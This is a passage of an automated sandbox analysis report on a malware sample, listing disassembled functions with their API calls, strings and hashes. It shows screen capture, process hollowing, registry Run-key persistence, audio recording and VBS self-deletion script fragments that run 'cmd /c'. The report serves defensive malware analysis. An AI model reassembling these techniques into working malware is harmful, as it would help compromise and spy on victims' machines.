                                                                                                                                                    Function 15698E76 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 15698E90
                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 15698E9D
                                                                                                                                                      • Part of subcall function 15699325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 15699355
                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 15698F13
                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 15698F2A
                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 15698F2D
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 15698F30
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 15698F51
                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 15698F62
                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 15698F65
                                                                                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 15698F89
                                                                                                                                                    • GetCursorInfo.USER32(?), ref: 15698FA7
                                                                                                                                                    • GetIconInfo.USER32(?,?), ref: 15698FBD
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 15698FEC
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 15698FF9
                                                                                                                                                    • DrawIcon.USER32(00000000,?,?,?), ref: 15699006
                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 1569903C
                                                                                                                                                    • GetObjectA.GDI32(00000000,00000018,?), ref: 15699068
                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 156990D5
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000000,?), ref: 15699144
                                                                                                                                                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 15699168
                                                                                                                                                    • DeleteDC.GDI32(?), ref: 1569917C
                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 1569917F
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 15699182
                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 1569918D
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 15699241
                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 15699248
                                                                                                                                                    • DeleteDC.GDI32(?), ref: 15699258
                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 15699263
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                                                                                    • String ID: DISPLAY
                                                                                                                                                    • API String ID: 4256916514-865373369
                                                                                                                                                    • Opcode ID: 16ecccabe4958e393dc6a6e9e6e6648edf8f52a79121c2e8642976a2966c737a
                                                                                                                                                    • Instruction ID: 24ad0c19830a6caeea3ae8d5f2f01b2b31164a13ccf78bc4f0544d115965c4e9
                                                                                                                                                    • Opcode Fuzzy Hash: 16ecccabe4958e393dc6a6e9e6e6648edf8f52a79121c2e8642976a2966c737a
                                                                                                                                                    • Instruction Fuzzy Hash: C4C15875608355AFD724DF24D844F6BBBEAFF89750F00481DF99A93290DB30A904CBA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156980EF Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 289libraryloaderthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 15698136
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 15698139
                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 1569814A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1569814D
                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 1569815E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 15698161
                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 15698172
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 15698175
                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 15698217
                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 1569822F
                                                                                                                                                    • GetThreadContext.KERNEL32(?,00000000), ref: 15698245
                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 1569826B
                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 156982ED
                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 15698301
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 15698341
                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 1569840B
                                                                                                                                                    • SetThreadContext.KERNEL32(?,00000000), ref: 15698428
                                                                                                                                                    • ResumeThread.KERNEL32(?), ref: 15698435
                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 1569844C
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 15698457
                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 15698472
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1569847A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                                                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`Wu$ntdll
                                                                                                                                                    • API String ID: 4188446516-529412701
                                                                                                                                                    • Opcode ID: 7ccbd9d1cd4cfa45d5afdea2cbbb06a98296a32aeb77367f135aca13cee87619
                                                                                                                                                    • Instruction ID: 831e36f8c1cda6a3e0464aa72ffe7c97d2f998fa46101b0868dc0037caff3755
                                                                                                                                                    • Opcode Fuzzy Hash: 7ccbd9d1cd4cfa45d5afdea2cbbb06a98296a32aeb77367f135aca13cee87619
                                                                                                                                                    • Instruction Fuzzy Hash: BAA139B0619315EFEB148F64CC85B6ABBE8FF48708F00492DFA85D6191DB70E844CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DED250 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02DED259
                                                                                                                                                      • Part of subcall function 02DED224: GetProcAddress.KERNEL32(00000000), ref: 02DED23D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                    • API String ID: 1646373207-1918263038
                                                                                                                                                    • Opcode ID: d7597e4de9b1ee200af5bfb0d9da0a5b5b8dfe02ca8446841ad61eb0e02ea7f7
                                                                                                                                                    • Instruction ID: 1ca2202c16e135f77f666ba916a07d1ab7dd3fa13e85b726827f7efd00d2cabc
                                                                                                                                                    • Opcode Fuzzy Hash: d7597e4de9b1ee200af5bfb0d9da0a5b5b8dfe02ca8446841ad61eb0e02ea7f7
                                                                                                                                                    • Instruction Fuzzy Hash: F0413965E842449F5E187B6E740042B77EFDB657107E4841BB80B9B348EE31AC928E3D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568D420 Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 282registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 15692850: TerminateProcess.KERNEL32(00000000,?,1568D80F), ref: 15692860
                                                                                                                                                      • Part of subcall function 15692850: WaitForSingleObject.KERNEL32(000000FF,?,1568D80F), ref: 15692873
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 1568D51D
                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 1568D530
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 1568D549
                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 1568D579
                                                                                                                                                      • Part of subcall function 1568B8AC: TerminateThread.KERNEL32(1568A27D,00000000,00000000,?,1568D442,?,00000000), ref: 1568B8BB
                                                                                                                                                      • Part of subcall function 1568B8AC: UnhookWindowsHookEx.USER32(156F50F0), ref: 1568B8C7
                                                                                                                                                      • Part of subcall function 1568B8AC: TerminateThread.KERNEL32(1568A267,00000000,?,1568D442,?,00000000), ref: 1568B8D5
                                                                                                                                                      • Part of subcall function 1569C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,1569C510,00000000,00000000,00000000), ref: 1569C430
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,156E6468,156E6468,00000000), ref: 1568D7C4
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 1568D7D0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                    • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                                                    • API String ID: 1861856835-1536747724
                                                                                                                                                    • Opcode ID: 232a92fc08f62edc496be6950214bc168af99b72f0b86a004c679b5376e2c88e
                                                                                                                                                    • Instruction ID: 323e3bde7e9c21dd54bc15700f104e0d4a970f319e8b0e825d1c766b4674f4ef
                                                                                                                                                    • Opcode Fuzzy Hash: 232a92fc08f62edc496be6950214bc168af99b72f0b86a004c679b5376e2c88e
                                                                                                                                                    • Instruction Fuzzy Hash: 7091A47570B3409AC714EB24DCA09EFB7F9AF95214F40052DE486972A0EF34BD49C6EA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15692475 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 190synchronizationsleepfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,156F50E4,00000003), ref: 15692494
                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 156924A0
                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 1569251A
                                                                                                                                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 15692529
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 15692534
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1569253B
                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 15692541
                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 15692572
                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 156925D5
                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 156925EF
                                                                                                                                                    • lstrcatW.KERNEL32(?,.exe), ref: 15692601
                                                                                                                                                      • Part of subcall function 1569C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,1569C510,00000000,00000000,00000000), ref: 1569C430
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 15692641
                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 15692682
                                                                                                                                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 15692697
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 156926A2
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 156926A9
                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 156926AF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                                                                    • String ID: .exe$WDH$exepath$open$temp_
                                                                                                                                                    • API String ID: 2649220323-3088914985
                                                                                                                                                    • Opcode ID: 9e7db75bcf764dea016dbaa5d9d591f5a06780edc00630d1660d24b9b2a66329
                                                                                                                                                    • Instruction ID: e6e34445b4ea9c93007e5a9d7fbe4b85ea1049e764ee0147320eccddff64bc5e
                                                                                                                                                    • Opcode Fuzzy Hash: 9e7db75bcf764dea016dbaa5d9d591f5a06780edc00630d1660d24b9b2a66329
                                                                                                                                                    • Instruction Fuzzy Hash: F2518475F12219AFDF14DBA0DC98EEE33BEAB44664F000659F942A7180DF346E45C6E4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569B047 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 1569B13C
                                                                                                                                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 1569B150
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,156E60A4), ref: 1569B178
                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,156F4EE0,00000000), ref: 1569B18E
                                                                                                                                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 1569B1CF
                                                                                                                                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 1569B1E7
                                                                                                                                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 1569B1FC
                                                                                                                                                    • SetEvent.KERNEL32 ref: 1569B219
                                                                                                                                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 1569B22A
                                                                                                                                                    • CloseHandle.KERNEL32 ref: 1569B23A
                                                                                                                                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 1569B25C
                                                                                                                                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 1569B266
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                                                                                    • API String ID: 738084811-1354618412
                                                                                                                                                    • Opcode ID: b05db0f30ea50cc85a5c187b50cde752859a441e11e2b8a5ac5d8fe4e5ed4434
                                                                                                                                                    • Instruction ID: 7f9240b59680aae1f0e2cf51b9bd380513ee0f60915cf4649973618584964734
                                                                                                                                                    • Opcode Fuzzy Hash: b05db0f30ea50cc85a5c187b50cde752859a441e11e2b8a5ac5d8fe4e5ed4434
                                                                                                                                                    • Instruction Fuzzy Hash: 0351817571A345AFD318EB30DCA0DAF77AEEB80255F40051EF446965A4EF20BD08C6EA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568D096 Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 260registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 15692850: TerminateProcess.KERNEL32(00000000,?,1568D80F), ref: 15692860
                                                                                                                                                      • Part of subcall function 15692850: WaitForSingleObject.KERNEL32(000000FF,?,1568D80F), ref: 15692873
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,156F52F0,?,pth_unenc), ref: 1568D1A5
                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 1568D1B8
                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,156F52F0,?,pth_unenc), ref: 1568D1E8
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,156F52F0,?,pth_unenc), ref: 1568D1F7
                                                                                                                                                      • Part of subcall function 1568B8AC: TerminateThread.KERNEL32(1568A27D,00000000,00000000,?,1568D442,?,00000000), ref: 1568B8BB
                                                                                                                                                      • Part of subcall function 1568B8AC: UnhookWindowsHookEx.USER32(156F50F0), ref: 1568B8C7
                                                                                                                                                      • Part of subcall function 1568B8AC: TerminateThread.KERNEL32(1568A267,00000000,?,1568D442,?,00000000), ref: 1568B8D5
                                                                                                                                                      • Part of subcall function 1569B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,1568407C), ref: 1569B99F
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,156E6468,156E6468,00000000), ref: 1568D412
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 1568D419
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                    • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                                                    • API String ID: 3797177996-3018399277
                                                                                                                                                    • Opcode ID: 5c6ba121bbc81939592028d2a9b04909d04d3e46372f4e47df596c0c85caf505
                                                                                                                                                    • Instruction ID: 5bd56f600e9d44516383a4af139d29851bb85ffebf176b6bf7e7534d51070221
                                                                                                                                                    • Opcode Fuzzy Hash: 5c6ba121bbc81939592028d2a9b04909d04d3e46372f4e47df596c0c85caf505
                                                                                                                                                    • Instruction Fuzzy Hash: 5381937571A3409BC719EB20DCA09AF73F9AF95214F50091DE486572A0EF34BD09C7EA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15687270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\fu56fbrtn8.exe,00000001,1568764D,C:\Users\user\Desktop\fu56fbrtn8.exe,00000003,15687675,156F52D8,156876CE), ref: 15687284
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1568728D
                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 156872A2
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 156872A5
                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 156872B6
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 156872B9
                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 156872CA
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 156872CD
                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 156872DE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 156872E1
                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 156872F2
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 156872F5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                    • String ID: C:\Users\user\Desktop\fu56fbrtn8.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                    • API String ID: 1646373207-1327784115
                                                                                                                                                    • Opcode ID: b38822725d5abc176da64822bfc66ab800aaf00aede4654ca7017c9bc5957147
                                                                                                                                                    • Instruction ID: 18b8f5c3db9abfc2ca53b0207c6d714eaa2d54adfd751239929375042fa8d3d7
                                                                                                                                                    • Opcode Fuzzy Hash: b38822725d5abc176da64822bfc66ab800aaf00aede4654ca7017c9bc5957147
                                                                                                                                                    • Instruction Fuzzy Hash: 0C0121B1E1232A66DB22AB7E5CB4D8B6E9CEE60165305192BF805D3501EE79C800CEF0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 1569C036
                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 1569C04E
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 1569C067
                                                                                                                                                    • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 1569C0A2
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 1569C0B5
                                                                                                                                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 1569C0F9
                                                                                                                                                    • lstrcmpW.KERNEL32(?,?), ref: 1569C114
                                                                                                                                                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 1569C12C
                                                                                                                                                    • _wcslen.LIBCMT ref: 1569C13B
                                                                                                                                                    • FindVolumeClose.KERNEL32(?), ref: 1569C15B
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1569C173
                                                                                                                                                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 1569C1A0
                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 1569C1B9
                                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 1569C1C8
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1569C1D0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                    • String ID: ?
                                                                                                                                                    • API String ID: 3941738427-1684325040
                                                                                                                                                    • Opcode ID: eca4ce2ec67ddafdce10265aec8574826e621569176dc9cc63942240dff0f4b7
                                                                                                                                                    • Instruction ID: 4e9413fb2ee1796e74f0ae15401a2f1e448a11214768cbb9070301c8cf2ba219
                                                                                                                                                    • Opcode Fuzzy Hash: eca4ce2ec67ddafdce10265aec8574826e621569176dc9cc63942240dff0f4b7
                                                                                                                                                    • Instruction Fuzzy Hash: E0419071A1835AAFE714DF60D88899B77EDFB44760F00092AF985C2160EB71D548CBD6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156CF42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
